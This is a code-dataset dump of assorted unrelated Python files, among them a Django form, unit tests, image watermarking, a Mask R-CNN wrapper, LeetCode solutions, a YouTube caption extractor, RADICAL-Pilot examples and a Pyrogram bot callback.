(('add', _(u'Add Tag/s')),\n ('delete', _(u'Delete Tag/s')),\n ('change_date', _(u'Change date')),\n ('change_album', _(u'Move to album'))\n )\n\n action = forms.ChoiceField(required=True,\n choices=UPDATE_ACTIONS)\n tags = forms.CharField(required=False)\n date = forms.DateField(\n required=False,\n error_messages={'required': _('Please enter a valid date'),\n 'invalid': _('Please enter a valid date')},)\n album = forms.ChoiceField(choices=Album.objects.all().order_by('name').values_list('id', 'name'))\n next = forms.CharField(required=True)\n\n def __init__(self, *args, **kwargs):\n super(UpdateTagsForm, self).__init__(*args, **kwargs)\n self.fields['album'].choices = Album.objects.all().order_by('name').values_list('id', 'name')\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-lg-2'\n self.helper.field_class = 'col-lg-4'\n self.helper.layout = Layout(\n 'action',\n 'tags',\n Div('date', css_class='date-picker-row-fluid'),\n 'album',\n Field('next', type=\"hidden\"),\n Div(\n Submit('submit', _(u'Update'), css_class='btn btn-default'),\n css_class='col-lg-offset-2 col-lg-4',\n ),\n )\n\n def clean(self):\n cleaned_data = super(UpdateTagsForm, self).clean()\n return cleaned_data\n","repo_name":"alexlittle/django-photo","sub_path":"photo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6150091124","text":"# encoding: utf-8\nfrom __future__ import unicode_literals\n\nfrom .. import unittest\nfrom compose import utils\n\n\nclass JsonSplitterTestCase(unittest.TestCase):\n\n def test_json_splitter_no_object(self):\n data = '{\"foo\": \"bar'\n self.assertEqual(utils.json_splitter(data), (None, None))\n\n def test_json_splitter_with_object(self):\n data = '{\"foo\": \"bar\"}\\n \\n{\"next\": \"obj\"}'\n self.assertEqual(\n utils.json_splitter(data),\n ({'foo': 'bar'}, '{\"next\": \"obj\"}')\n )\n\n\nclass StreamAsTextTestCase(unittest.TestCase):\n\n def test_stream_with_non_utf_unicode_character(self):\n stream = [b'\\xed\\xf3\\xf3']\n output, = utils.stream_as_text(stream)\n assert output == '���'\n\n def test_stream_with_utf_character(self):\n stream = ['ěĝ'.encode('utf-8')]\n output, = utils.stream_as_text(stream)\n assert output == 'ěĝ'\n","repo_name":"majidgolshadi/compose","sub_path":"tests/unit/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"41773271462","text":"from PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\n\ndef watermark_text(input_image_path, output_image_path, text, pos):\n photo = Image.open(input_image_path)\n\n # make the image editable\n drawing = ImageDraw.Draw(photo)\n\n black = (3, 8, 12)\n font = ImageFont.truetype(\"Pillow/Tests/fonts/FreeMono.ttf\", 40)\n drawing.text(pos, text, fill=black, font=font)\n photo.show()\n photo.save(output_image_path)\n\n\ndef watermark_with_transparency(\n input_image_path, output_image_path, watermark_image_path, position\n):\n base_image = Image.open(input_image_path)\n watermark = Image.open(watermark_image_path)\n width, height = base_image.size\n\n transparent = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n transparent.paste(base_image, (0, 0))\n transparent.paste(watermark, position, mask=watermark)\n # transparent.show()\n 
transparent.save(output_image_path)\n","repo_name":"peterdudfield/mart","sub_path":"mandelbrot/src/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20704922546","text":"from torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.models.detection.mask_rcnn import MaskRCNNPredictor\nimport torchvision.models.detection.mask_rcnn\n\nclass Model:\n\tdef __init__(self, num_classes):\n\t\t# Load an instance segmentation model pre-trained on COCO\n\t\tself.model = torchvision.models.detection.maskrcnn_resnet50_fpn(pretrained=True)\n\n\t\t# Get number of input features for the classifier\n\t\tin_features = self.model.roi_heads.box_predictor.cls_score.in_features\n\t\t# replace the pre-trained head with a new one\n\t\tself.model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n\n\t\t# Get the number of input features for the mask classifier\n\t\tin_features_mask = self.model.roi_heads.mask_predictor.conv5_mask.in_channels\n\t\thidden_layer = 256\n\t\t# Replace the mask predictor with a new one\n\t\tself.model.roi_heads.mask_predictor = MaskRCNNPredictor(in_features_mask,\n\t\t \t\thidden_layer,\n\t\t \t\tnum_classes)\n\n\t\t\t\t\t\t\t \n\tdef __call__(self):\n\t\treturn self.model\n\n\n","repo_name":"jelyoussefi/maskrcnn_resnet50_fpn-training","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"4134821135","text":"'''\n74. Search a 2D Matrix\n\nWrite an efficient algorithm that searches for a value target in an m x n integer matrix matrix. This matrix has the following properties:\n\nIntegers in each row are sorted from left to right.\nThe first integer of each row is greater than the last integer of the previous row.\n\nhttps://leetcode.com/problems/search-a-2d-matrix/\n'''\n\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n if(len(matrix)==0):\n return False\n \n n = len(matrix)\n m=len(matrix[0])\n \n low = 0\n high = (n*m)-1\n \n while(low<=high):\n mid = low+(high-low)//2\n \n if(matrix[mid//m][mid%m] == target):\n return True\n elif(matrix[mid//m][mid%m] 1:\n session_name = sys.argv[1]\n else:\n session_name = None\n\n # Create a new session. No need to try/except this: if session creation\n # fails, there is not much we can do anyways...\n session = rp.Session(uid=session_name)\n print(\"session id: %s\" % session.uid)\n\n # all other pilot code is now tried/excepted. If an exception is caught, we\n # can rely on the session object to exist and be valid, and we can thus tear\n # the whole RP stack down via a 'session.close()' call in the 'finally'\n # clause...\n try:\n\n # Add a Pilot Manager. Pilot managers manage one or more Pilots.\n pmgr = rp.PilotManager (session=session)\n\n # Register our callback with the PilotManager. 
This callback will get\n # called every time any of the pilots managed by the PilotManager\n # change their state.\n pmgr.register_callback (pilot_state_cb)\n\n # Define a 4-core local pilot that runs for 10 minutes and cleans up\n # after itself.\n\n pdesc1 = rp.PilotDescription()\n pdesc1.resource = \"local.localhost\"\n pdesc1.runtime = 10 # minutes\n pdesc1.cores = 2\n\n pdesc2 = rp.PilotDescription()\n pdesc2.resource = \"local.localhost\"\n pdesc2.runtime = 10 # minutes\n pdesc2.cores = 2\n\n # Launch the pilots\n pilots = pmgr.submit_pilots([pdesc1, pdesc2])\n\n # wait for them to become active\n pmgr.wait_pilots (state=[rp.PMGR_ACTIVE, rp.DONE, rp.FAILED])\n\n\n # Combine the Pilot, the Tasks and a scheduler via\n # a TaskManager object.\n tmgr = rp.TaskManager (session = session,\n scheduler = rp.SCHEDULER_BACKFILLING)\n\n # Register our callback with the TaskManager. This callback will get\n # called every time any of the tasks managed by the TaskManager\n # change their state.\n tmgr.register_callback (task_state_cb, rp.TASK_STATE)\n\n # Register also a callback which tells us when all tasks have been\n # assigned to pilots\n tmgr.register_callback(wait_queue_size_cb, rp.WAIT_QUEUE_SIZE)\n\n\n # Add the previously created Pilot to the TaskManager.\n tmgr.add_pilots (pilots)\n\n # Create a workload of restartable Tasks (tasks).\n tds = []\n for task_count in range(0, 32):\n td = rp.TaskDescription()\n td.executable = \"/bin/sleep\"\n td.arguments = [\"10\"]\n td.restartable = True\n\n tds.append(td)\n\n # Submit the previously created Task descriptions to the\n # PilotManager. This will trigger the selected scheduler to start\n # assigning Tasks to the Pilots.\n tasks = tmgr.submit_tasks(tds)\n\n # the pilots have a total of 4 cores, and run for 10 min. A Task needs about\n # 10 seconds, so we can handle about 24 tasks per minute, and need a total\n # of about 3 minutes. We now wait for 60 seconds, and then cancel the first\n # pilot. The 2 tasks currently running on that pilot will fail, and\n # maybe 2 more which are being pre-fetched into the pilot at that stage\n # - all others should get rescheduled to the other pilot.\n time.sleep(60)\n pilots[0].wait(state=rp.PMGR_ACTIVE)\n pilots[0].cancel()\n\n # Wait for all tasks to reach a terminal state (DONE or FAILED).\n tmgr.wait_tasks()\n\n print('tasks all completed')\n print('----------------------------------------------------------------------')\n\n for task in tasks:\n task.wait()\n\n for task in tasks:\n print(\"* Task %s state: %s, exit code: %s\"\n % (task.uid, task.state, task.exit_code))\n\n except Exception as e:\n # Something unexpected happened in the pilot code above\n print(\"caught Exception: %s\" % e)\n raise\n\n except (KeyboardInterrupt, SystemExit) as e:\n # the callback called sys.exit(), and we can here catch the\n # corresponding KeyboardInterrupt exception for shutdown. 
We also catch\n # SystemExit (which gets raised if the main threads exits for some other\n # reason).\n print(\"need to exit now: %s\" % e)\n\n finally:\n # always clean up the session, no matter if we caught an exception or\n # not.\n print(\"closing session\")\n session.close ()\n\n # the above is equivalent to\n #\n # session.close (terminate=True)\n #\n # it will thus both clean out the session's database record, and kill\n # all remaining pilots (none in our example).\n\n# -------------------------------------------------------------------------------\n","repo_name":"radical-cybertools/radical.pilot","sub_path":"examples/misc/backfilling_recovery.py","file_name":"backfilling_recovery.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"27"} +{"seq_id":"34802246754","text":"from datetime import datetime\nimport os, os.path\nimport json\nfrom bs4 import BeautifulSoup\nimport youtube_dl\nfrom pycaption import DFXPReader\nfrom concurrent.futures import ThreadPoolExecutor\nimport sqlite3\n\nDB_NAME = '../captions.db'\n\ndef init_db():\n # Tables:\n # files(name)\n # video(id, name, image, transcript) % Technically denormalized a bit for convenience.\n # transcription(vid, start, end, text)\n with sqlite3.connect(DB_NAME) as conn:\n curr = conn.cursor()\n curr.execute('''\n CREATE TABLE video(\n name TEXT NOT NULL,\n image_name TEXT,\n transcript TEXT NOT NULL,\n youtube_id INTEGER NOT NULL\n )\n ''')\n curr.execute('''\n CREATE TABLE transcription(\n video INTEGER NOT NULL,\n start INTEGER NOT NULL,\n stop INTEGER NOT NULL,\n caption TEXT NOT NULL\n )\n ''')\n conn.commit()\n\nTHREAD_COUNT = 32\n\n\"\"\"\nGrab the captions from every video in a YouTube watch-history.html from Google Takeout\n\nOutputs id_to_filename.json which lists the ids and file prefixes (:) \nfor all of the videos. (files are in \"-.txt\" format)\n\nUsage: \n 0. `sudo pip install -r requirements.txt`\n\n 1. move your YouTube folder from Takeout into ../ from this script\n\n 2. `python3 extractor.py` # this takes a LONG time\n\n 3. \n ```\n rm -rf *.ttml # optional \n\n mkdir data\n mv *.txt data/\n mv *.jpg data/\n\n 4.\n ```\n cd ..\n python3 tf_idf.py\n ```\n\n 5. 
Open Jupyter notebook to Plotting.ipynb or Plotting-copy\n\"\"\"\n# TODO: give option for checkpoints\n# TODO: save also the publisher of the video\n\ndef timeit(func):\n def wrapper(*args, **kwargs):\n start_time = datetime.now()\n func_out = func(*args, **kwargs)\n end_time = datetime.now()\n print('This took: {}'.format(end_time - start_time))\n return func_out\n return wrapper\n\ndef partition(data, pcount):\n plen = int(len(data) / pcount)\n result = []\n current = 0\n for i in range(pcount-1):\n result.append(data[current:current+plen])\n current += plen\n result.append(data[current:])\n return result\n\n@timeit\ndef download_captions():\n # GRAB LINKS\n watch_history_path = '../YouTube/history/watch-history.html'\n soup = BeautifulSoup(open(watch_history_path, encoding='utf8'), 'html.parser')\n links = [link.attrs['href'] for link in soup.find_all('a')] # grab links\n links = list(set(links)) # remove dupes\n print(\"Found {} unique video links in watch-history.html\".format(len(links))) \n # GET IDS AND TITLES OF ALL VIDEOS\n class Logger(object):\n def __init__(self):\n self.logs = []\n def debug(self, msg):\n if not msg.startswith('['):\n self.logs.append(msg)\n def warning(self, msg):\n print(\"WARNING: \"+msg)\n def error(self, msg):\n print(msg)\n\n # MAIN PARAMS\n def progress_hook(d):\n part = d['fragment_index']\n tot = d['fragment_count']\n print(\"{}/{} captions downloaded\".format(part, tot))\n if d['status'] == 'finished':\n print('Done downloading, now converting ...')\n\n logger = Logger()\n ydl_opts = {\n 'skip_download': True,\n 'ignoreerrors': True,\n 'forceid': True,\n 'forcefilename': True,\n 'writeautomaticsub': True,\n 'writethumbnail': True,\n 'subtitlesformat': 'ttml',\n 'logger': logger,\n 'progress_hooks': [progress_hook],\n }\n def download_links(links):\n # DOWNLOAD CAPTIONS AND THUMBNAILS\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([links])\n with ThreadPoolExecutor(max_workers=THREAD_COUNT) as executor:\n executor.map(download_links, links)\n # threads = [Thread(target=download_links, args=(new_links,)) for new_links in partition(links, THREAD_COUNT)]\n # for t in threads:\n # t.daemon = True\n # t.start()\n # for t in threads:\n # t.join()\n \n\ndef find_valid_files():\n pass\n\ndef read_bin(name):\n with open(name, mode='rb') as f:\n return f.read()\n\n@timeit\ndef parse_captions(path='./'):\n # GRAB ALL VALID CAPTION FILES AND THEIR FILENAMES\n filenames = []\n ids = []\n for file in os.listdir(path):\n if file.endswith(\".ttml\"):\n filenames.append(file[:-8])\n ids.append(file[-19:-8])\n id_to_filename = {ids[i] : filenames[i] for i in range(len(filenames))}\n\n # PARSE CAPTIONS AND PUT THEM IN NICE FORMAT\n cap_reader = DFXPReader()\n\n good_id_to_filename = {} # only save ones that have captions\n n = 0\n N = len(id_to_filename)\n for id in id_to_filename:\n n+=1\n ttml_file = path+id_to_filename[id]+'.en.ttml'\n text_file = path+id_to_filename[id]+'.txt'\n image_file = path+id_to_filename[id]+'.jpg'\n # check if file exists. 
if not, this video has no autocaptions\n if os.path.isfile(ttml_file) and os.path.isfile(image_file):\n good_id_to_filename[id] = id_to_filename[id]\n with open(ttml_file, 'r', encoding='utf8') as f:\n ttml_txt = f.read()\n caption_set = cap_reader.read(ttml_txt)\n captions = caption_set.get_captions('en-US')\n caption_text = ' '.join([caption.get_text() if caption is not None else '' \\\n for caption in captions])\n with sqlite3.connect(DB_NAME) as conn:\n curs = conn.cursor()\n image_name = id_to_filename[id]+'.jpg'\n video_name = id_to_filename[id]\n curs.execute('INSERT INTO video(name, image_name, transcript, youtube_id) VALUES(?, ?, ?, ?)', (video_name, image_name, caption_text, id,))\n video_id = curs.lastrowid\n for cap in captions:\n if cap is not None:\n curs.execute('INSERT INTO transcription(video, start, stop, caption) VALUES(?, ?, ?, ?)', (video_id, cap.start, cap.end, cap.get_text(),))\n conn.commit()\n with open(text_file, 'w', encoding='utf8') as f:\n f.write(caption_text)\n if n % 100 == 0:\n print(\"{}/{} captions grabbed\".format(n, N))\n\n json.dump(good_id_to_filename, open('id_to_filename.json', 'w'), separators=(', \\n', ': '))\n print(\"Saved captions and thumbnails for {} videos\".format(len(good_id_to_filename)))\n print(\"Done.\")\n\nif __name__ == '__main__':\n init_db()\n download_captions()\n parse_captions(path='./')\n","repo_name":"matwilso/datamining_project","sub_path":"extraction/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71457767751","text":"\"\"\" EXERCISE 4\nFor this exercise suppose you have a web API load balanced across multiple\nnodes. This API receives various requests for resources and logs each request\nto some local storage. Each instance of the API is able to return a dictionary\ncontaining the resource that was accessed (the dictionary key) and the number\nof times it was requested (the associated value).\n\nYour task here is to identify resources that have been requested on some, but\nnot all the servers, so you can determine if you have an issue with your load\nbalancer not distributing certain resource requests across all nodes.\n\nFor simplicity, we will assume that there are exactly 3 nodes in the cluster.\n\nYou should write a function that takes 3 dictionaries as arguments for node 1,\nnode 2, and node 3, and returns a dictionary that contains only keys that are\nnot found in all of the dictionaries. The value should be a list containing the\nnumber of times it was requested in each node (the node order should match the\ndictionary (node) order passed to your function). 
Use 0 if the resource was not\nrequested from the corresponding node.\n\nSuppose your dictionaries are for logs of all the GET requests on each node:\n\n n1 = {'employees': 100, 'employee': 5000, 'users': 10, 'user': 100}\n n2 = {'employees': 250, 'users': 23, 'user': 230}\n n3 = {'employees': 150, 'users': 4, 'login': 1000}\n\n\nYour result should then be:\n result = {'employee': (5000, 0, 0),\n 'user': (100, 230, 0),\n 'login': (0, 0, 1000)}\n\"\"\"\n\ndef resources_requested(n1, n2, n3):\n nodes = [n1, n2, n3]\n incomplete_intersection = set()\n for i in range(-2,1):\n incomplete_intersection.add(*{key for key in nodes[i].keys()\n if not nodes[i+1].get(key) or not nodes[i+2].get(key)\n and key not in incomplete_intersection})\n resource_dict = {key : (n1.get(key, 0), n2.get(key, 0), n3.get(key, 0)) \n for key in incomplete_intersection}\n return resource_dict\n\n\n# Testing\nn1 = {'employees': 100, 'employee': 5000, 'users': 10, 'user': 100}\nn2 = {'employees': 250, 'users': 23, 'user': 230}\nn3 = {'employees': 150, 'users': 4, 'login': 1000}\n\nprint(resources_requested(n1, n2, n3))\n\n\n# Alternative approach:\ndef identify(n1, n2, n3):\n union = n1.keys() | n2.keys() | n3.keys()\n intersection = n1.keys() & n2.keys() & n3.keys()\n relevant = union - intersection\n result = {key: (n1.get(key, 0),\n n2.get(key, 0),\n n3.get(key, 0))\n for key in relevant}\n return result","repo_name":"EmPlatts/UdemyPython3_DeepDive-My_Solutions","sub_path":"Part_3-Hash-Maps/Exercise_set_1/Exercise_4.py","file_name":"Exercise_4.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37979505368","text":"import pandas as lectorCsv\nfrom datetime import datetime\nfrom statsmodels.tsa.arima_model import ARIMA\nimport numpy as np\nimport joblib as jb\n\n\ndef predecir(n):\n\n # Carga modelos https://joblib.readthedocs.io/en/latest/persistence.html\n modeloTemperatura = jb.load('./modeloTemperatura.pkl')\n modeloHumedad = jb.load('./modeloHumedad.pkl')\n \n # Intervalo de confianza https://github.com/manuparra/MaterialCC2020/blob/master/exampleARIMA_humidity.py\n prediccionTemperatura, confint = modeloTemperatura.predict(n_periods=n, return_conf_int=True)\n prediccionHumedad, confint = modeloHumedad.predict(n_periods=n, return_conf_int=True)\n \n hoy = datetime.now()\n indice = lectorCsv.date_range(hoy, periods=n, freq='H')\n\n datosPrediccion = lectorCsv.DataFrame(index=indice, columns=['Hora','Temperatura','Humedad'])\n # Crear array https://numpy.org/doc/stable/reference/generated/numpy.array.html\n temperatura = np.array(prediccionTemperatura)\n humedad = np.array(prediccionHumedad)\n datosPrediccion['Hora'] = indice.strftime('%B %d, %Y, %r')\n datosPrediccion['Temperatura'] = temperatura\n datosPrediccion['Humedad'] = humedad\n\n return datosPrediccion.to_json(orient='records')\n","repo_name":"Guillergood/CC-Repo-V1","sub_path":"predecir.py","file_name":"predecir.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2705427770","text":"import cPickle as pickle\nimport latex_access\n\n\nclass preprocessor(latex_access.translator):\n '''Preprocessor translator\n\n All translations done by this translator should use the general_command mechanism rather than custom functions.'''\n def __init__(self):\n latex_access.translator.__init__(self) \n self.table={}\n\n def add(self,command,translation):\n '''Add a 
translation to the table.'''\n self.table[command]=translation\n\n def add_from_string(self, command, args, translation_string):\n '''This adds a command to the preprocessor given its number of arguments as well as its output in the form of an argument to \\newcommand.\n\n Therefore the final argument is a string using #n to denote the nth argument.'''\n translation=[]\n translation.append(args)\n l=translation_string.split(\"#\")\n translation.append(l[0])\n for s in l[1:]:\n translation.append(int(s[0]))\n translation.append(s[1:])\n self.table[command]=translation\n\n def write(self, filename):\n '''Saves the preprocessor entries to a file.'''\n f=open(filename,\"w\")\n pickle.dump(self.table,f)\n f.close()\n\n def read(self, filename):\n '''Reads preprocessor entries from a file and appends them to the dictionary.'''\n f=open(filename)\n newtable=pickle.load(f)\n f.close()\n for (k,v) in newtable.iteritems():\n self.table[k]=v\n\nclass newcommands(latex_access.translator):\n '''Provides a translator to extract all \\newcommand commands from a string.'''\n def __init__(self,preprocessor):\n latex_access.translator.__init__(self)\n self.table={\"\\\\newcommand\":self.newcommand,\"\\\\renewcommand\":self.newcommand}\n self.preprocessor=preprocessor\n \n def newcommand(self, input, start):\n command=latex_access.get_arg(input,start)\n args=latex_access.get_optional_arg(input,command[1])\n if args:\n start=args[1]\n args=int(args[0])\n else:\n args=0\n start=command[1]\n translation=latex_access.get_arg(input,start)\n self.preprocessor.add_from_string(command[0],args,translation[0])\n return (\"\",translation[1])\n \n\n","repo_name":"derekriemer/latex-access-matrix","sub_path":"addon/latex_access/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"243510096","text":"class Solution:\n # @param head, a RandomListNode\n # @return a RandomListNode\n def copyRandomList(self, head):\n if head == None: return None\n tmp = head\n while tmp:\n newNode = RandomListNode(tmp.label)\n newNode.next = tmp.next\n tmp.next = newNode\n tmp = tmp.next.next\n tmp = head\n while tmp:\n if tmp.random:\n tmp.next.random = tmp.random.next\n tmp = tmp.next.next\n newhead = head.next\n pold = head\n pnew = newhead\n while pnew.next:\n pold.next = pnew.next\n pold = pold.next\n pnew.next = pold.next\n pnew = pnew.next\n pold.next = None\n pnew.next = None\n return newhead\n","repo_name":"lizyang95/leetcode","sub_path":"leetcode1/copyRandomList.py","file_name":"copyRandomList.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24279071747","text":"\nimport radical.saga.attributes as rsa\n\nimport spec_attribs as a\n\n\n# ------------------------------------------------------------------------------\n#\nclass OLD_CUD(rsa.Attributes):\n\n def validate(self):\n pass\n\n # --------------------------------------------------------------------------\n #\n def __init__(self, from_dict=None):\n\n # initialize attributes\n rsa.Attributes.__init__(self)\n\n # set attribute interface properties\n self._attributes_extensible (False)\n self._attributes_camelcasing (True)\n\n # register properties with the attribute interface\n # action description\n self._attributes_register(a.KERNEL, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.NAME, None, rsa.STRING, 
rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.EXECUTABLE, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.ARGUMENTS, None, rsa.STRING, rsa.VECTOR, rsa.WRITEABLE)\n self._attributes_register(a.ENVIRONMENT, None, rsa.STRING, rsa.DICT, rsa.WRITEABLE)\n self._attributes_register(a.SANDBOX, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.PRE_EXEC, None, rsa.STRING, rsa.VECTOR, rsa.WRITEABLE)\n self._attributes_register(a.POST_EXEC, None, rsa.STRING, rsa.VECTOR, rsa.WRITEABLE)\n self._attributes_register(a.RESTARTABLE, None, rsa.BOOL, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.TAGS, None, rsa.ANY, rsa.DICT, rsa.WRITEABLE)\n self._attributes_register(a.METADATA, None, rsa.ANY, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.CLEANUP, None, rsa.BOOL, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.PILOT, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n\n\n # I/O\n self._attributes_register(a.STDOUT, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.STDERR, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.INPUT_STAGING, None, rsa.ANY, rsa.VECTOR, rsa.WRITEABLE)\n self._attributes_register(a.OUTPUT_STAGING, None, rsa.ANY, rsa.VECTOR, rsa.WRITEABLE)\n\n # resource requirements\n self._attributes_register(a.CPU_PROCESSES, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.CPU_PROCESS_TYPE, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.CPU_THREADS, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.CPU_THREAD_TYPE, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.GPU_PROCESSES, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.GPU_PROCESS_TYPE, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.GPU_THREADS, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.GPU_THREAD_TYPE, None, rsa.STRING, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.LFS_PER_PROCESS, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n self._attributes_register(a.MEM_PER_PROCESS, None, rsa.INT, rsa.SCALAR, rsa.WRITEABLE)\n\n # explicitly set attrib defaults so they get listed and included via as_dict()\n self.set_attribute (a.KERNEL, None)\n self.set_attribute (a.NAME, None)\n self.set_attribute (a.EXECUTABLE, None)\n self.set_attribute (a.SANDBOX, None)\n self.set_attribute (a.ARGUMENTS, list())\n self.set_attribute (a.ENVIRONMENT, dict())\n self.set_attribute (a.PRE_EXEC, list())\n self.set_attribute (a.POST_EXEC, list())\n self.set_attribute (a.STDOUT, None)\n self.set_attribute (a.STDERR, None)\n self.set_attribute (a.INPUT_STAGING, list())\n self.set_attribute (a.OUTPUT_STAGING, list())\n\n self.set_attribute (a.CPU_PROCESSES, 1)\n self.set_attribute (a.CPU_PROCESS_TYPE, '')\n self.set_attribute (a.CPU_THREADS, 1)\n self.set_attribute (a.CPU_THREAD_TYPE, '')\n self.set_attribute (a.GPU_PROCESSES, 0)\n self.set_attribute (a.GPU_PROCESS_TYPE, '')\n self.set_attribute (a.GPU_THREADS, 1)\n self.set_attribute (a.GPU_THREAD_TYPE, '')\n self.set_attribute (a.GPU_THREAD_TYPE, '')\n self.set_attribute (a.LFS_PER_PROCESS, 0)\n self.set_attribute (a.MEM_PER_PROCESS, 0)\n\n self.set_attribute (a.RESTARTABLE, False)\n self.set_attribute (a.TAGS, dict())\n self.set_attribute (a.METADATA, None)\n self.set_attribute (a.CLEANUP, False)\n self.set_attribute (a.PILOT, '')\n\n # self._attributes_rega.ister_deprecated(a.CORES, CPU_PROCESSES)\n 
# self._attributes_register_deprecated(a.MPI, CPU_PROCESS_TYPE)\n\n # apply initialization dict\n if from_dict:\n self.from_dict(from_dict)\n\n\n # --------------------------------------------------------------------------\n #\n def __deepcopy__ (self, memo):\n\n other = RSA()\n\n for key in self.list_attributes ():\n other.set_attribute(key, self.get_attribute (key))\n\n return other\n\n\n # --------------------------------------------------------------------------\n #\n def __str__(self):\n \"\"\"Returns a string representation of the object.\n \"\"\"\n return str(self.as_dict())\n\n\n # --------------------------------------------------------------------------\n #\n def verify(self):\n '''\n Verify that the description is syntactically and semantically correct.\n This method encapsulates checks beyond the SAGA attribute level checks.\n '''\n\n # replace 'None' values for string types with '', etc\n if self.get(KERNEL ) is None: self[KERNEL ] = ''\n if self.get(NAME ) is None: self[NAME ] = ''\n if self.get(EXECUTABLE ) is None: self[EXECUTABLE ] = ''\n if self.get(ARGUMENTS ) is None: self[ARGUMENTS ] = list()\n if self.get(ENVIRONMENT ) is None: self[ENVIRONMENT ] = dict()\n if self.get(PRE_EXEC ) is None: self[PRE_EXEC ] = list()\n if self.get(POST_EXEC ) is None: self[POST_EXEC ] = list()\n if self.get(PILOT ) is None: self[PILOT ] = ''\n if self.get(STDOUT ) is None: self[STDOUT ] = ''\n if self.get(STDERR ) is None: self[STDERR ] = ''\n if self.get(CPU_PROCESS_TYPE) is None: self[CPU_PROCESS_TYPE] = ''\n if self.get(CPU_THREAD_TYPE ) is None: self[CPU_THREAD_TYPE ] = ''\n if self.get(GPU_PROCESS_TYPE) is None: self[GPU_PROCESS_TYPE] = ''\n if self.get(GPU_THREAD_TYPE ) is None: self[GPU_THREAD_TYPE ] = ''\n if self.get(CPU_PROCESSES ) is None: self[CPU_PROCESSES ] = 0\n if self.get(CPU_THREADS ) is None: self[CPU_THREADS ] = 0\n if self.get(GPU_PROCESSES ) is None: self[GPU_PROCESSES ] = 0\n if self.get(GPU_THREADS ) is None: self[GPU_THREADS ] = 0\n if self.get(MEM_PER_PROCESS) is None: self[MEM_PER_PROCESS ] = 0\n\n if not self.get('executable') and \\\n not self.get('kernel') :\n raise ValueError(\"Task description needs 'executable' or 'kernel'\")\n\n\n\n# ------------------------------------------------------------------------------\n\n","repo_name":"radical-cybertools/radical.pilot","sub_path":"concepts/dicts/spec_rs.py","file_name":"spec_rs.py","file_ext":"py","file_size_in_byte":7747,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"27"} {"seq_id":"26221717036","text":"from pyrogram import Client, filters\nfrom pyrogram.types import CallbackQuery\n\n# Example 1 uses a custom filter\n\nasync def alert(_, __, cb: CallbackQuery):\n return cb.data == \"alert\"\nalert_filter = filters.create(alert)\n\n@Client.on_callback_query(alert_filter)\nasync def alert_cb(_, cb: CallbackQuery):\n await cb.answer(\"Halo, ini adalah pesan alert\", show_alert=True)\n\n\n# Example 2 does not use a filter, but an if statement instead\n\n@Client.on_callback_query()\nasync def alert_cb_2(_, cb: CallbackQuery):\n if cb.data == \"alert_2\":\n await cb.answer(\"Halo, ini adalah pesan alert\", show_alert=True)\n","repo_name":"hwdevs/HelloWorldTG","sub_path":"helloworld/plugins/callbacks/alert_callback.py","file_name":"alert_callback.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} {"seq_id":"20640322201","text":"from struct import unpack\n\n\nclass 
